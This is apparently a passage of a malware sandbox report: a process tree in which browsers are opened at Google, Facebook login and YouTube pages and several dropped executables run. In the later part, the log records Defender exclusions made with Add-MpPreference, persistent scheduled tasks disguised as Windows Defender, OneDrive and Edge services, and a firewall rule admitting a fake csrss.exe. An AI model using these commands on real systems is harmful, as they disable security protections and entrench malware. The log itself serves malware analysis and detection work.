"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
4⤵
PID:4492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
4⤵
PID:1148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
4⤵
PID:4336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
4⤵
PID:5060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2016 /prefetch:2
4⤵
PID:1752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
4⤵
PID:4476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
4⤵
PID:3572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
4⤵
PID:2428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:8
4⤵
PID:5644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 /prefetch:8
4⤵
PID:6468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
4⤵
PID:7180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
4⤵
PID:7172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
4⤵
PID:8212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6412 /prefetch:1
4⤵
PID:8200

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6212 /prefetch:8
4⤵
PID:6480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
3⤵
PID:724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,11034330155269956907,15992739378761193416,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
4⤵
PID:4880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,11034330155269956907,15992739378761193416,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2036 /prefetch:2
4⤵
PID:4592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
3⤵
PID:892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,9899604551069110004,12052961699108408734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 /prefetch:3
4⤵
PID:2240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
3⤵
PID:2820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8917d9758,0x7ff8917d9768,0x7ff8917d9778
4⤵
PID:3460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3008 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:6744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:6732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:8
4⤵
PID:6684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1872 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:8
4⤵
PID:6676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:2
4⤵
PID:6668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4116 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:7248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3848 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:6192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4732 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:7552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
3⤵
PID:248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8917d9758,0x7ff8917d9768,0x7ff8917d9778
4⤵
PID:4716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1856 --field-trial-handle=1944,i,5142353254251916147,6093205445681297400,131072 /prefetch:8
4⤵
PID:6376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1944,i,5142353254251916147,6093205445681297400,131072 /prefetch:2
4⤵
PID:6368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
3⤵
PID:4808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1956,i,3428422894561390492,14100910390073308665,131072 /prefetch:8
4⤵
PID:7332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1956,i,3428422894561390492,14100910390073308665,131072 /prefetch:2
4⤵
PID:7324

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
3⤵
PID:6940

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
3⤵
PID:6924

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
3⤵
PID:3068

C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
2⤵
PID:5444

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
3⤵
PID:1924

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:8052

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7560

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7392

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:6392

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7304

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9519" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7204

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk1657" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7212

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk50" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:2124

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk4860" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:5136

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:5904

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:5964

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7620

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
PID:8428

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
2⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\is-L3QCG.tmp\tuc6.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L3QCG.tmp\tuc6.tmp" /SL5="$40280,4302127,566784,C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
3⤵
PID:5864

C:\Users\Admin\AppData\Local\Temp\Files\windows.exe
"C:\Users\Admin\AppData\Local\Temp\Files\windows.exe"
2⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\Files\up.exe
"C:\Users\Admin\AppData\Local\Temp\Files\up.exe"
2⤵
PID:5612

C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe
"C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe"
2⤵
PID:7260

C:\Users\Admin\AppData\Local\Temp\ghoul.exe
"C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
3⤵
PID:8464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
PID:8752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
4⤵
PID:2012

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
5⤵
- Creates scheduled task(s)
PID:6548

C:\Users\Admin\AppData\Local\Temp\Files\288cccc47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\Files\288cccc47bbc1871b439df19ff4df68f076.exe"
2⤵
PID:7936

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
3⤵
PID:8764

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
4⤵
PID:8952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
5⤵
PID:2044

C:\Windows\SysWOW64\chcp.com
chcp 1251
6⤵
PID:8260

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
6⤵
- Creates scheduled task(s)
PID:7880

C:\Users\Admin\AppData\Local\Temp\nsiA44C.tmp
C:\Users\Admin\AppData\Local\Temp\nsiA44C.tmp
4⤵
PID:1892

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
3⤵
PID:9048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 500
4⤵
- Program crash
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 504
4⤵
- Program crash
PID:8924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 520
4⤵
- Program crash
PID:9164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 696
4⤵
- Program crash
PID:7996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 732
4⤵
- Program crash
PID:8048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 832
4⤵
- Program crash
PID:5764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 764
4⤵
- Program crash
PID:8656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 788
4⤵
- Program crash
PID:8692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 652
4⤵
- Program crash
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 924
4⤵
- Program crash
PID:8324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 780
4⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 972
4⤵
- Program crash
PID:8256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 980
4⤵
- Program crash
PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 896
4⤵
- Program crash
PID:7908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:8868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 928
4⤵
- Program crash
PID:8796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 648
4⤵
- Program crash
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 792
4⤵
- Program crash
PID:8616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 768
4⤵
- Program crash
PID:8704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 732
4⤵
PID:8264

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
4⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 368
5⤵
PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 672
5⤵
PID:7080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 672
5⤵
PID:6496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 748
5⤵
PID:7212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 756
5⤵
PID:7224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 788
5⤵
PID:9064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:8504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 660
5⤵
PID:8420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 488
5⤵
PID:8932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 484
5⤵
PID:8900

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:6660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:5828

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
PID:5588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 500
6⤵
PID:6416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 516
6⤵
PID:7380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 544
6⤵
PID:6908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 640
6⤵
PID:6952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 748
6⤵
PID:6604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 732
6⤵
PID:6644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 748
6⤵
PID:6276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 776
6⤵
PID:6508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 804
6⤵
PID:5820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:6452

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:7768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 660
6⤵
PID:8892

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:2820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 952
6⤵
PID:840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 968
6⤵
PID:6772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:2008

C:\Windows\SysWOW64\WerFault.exe
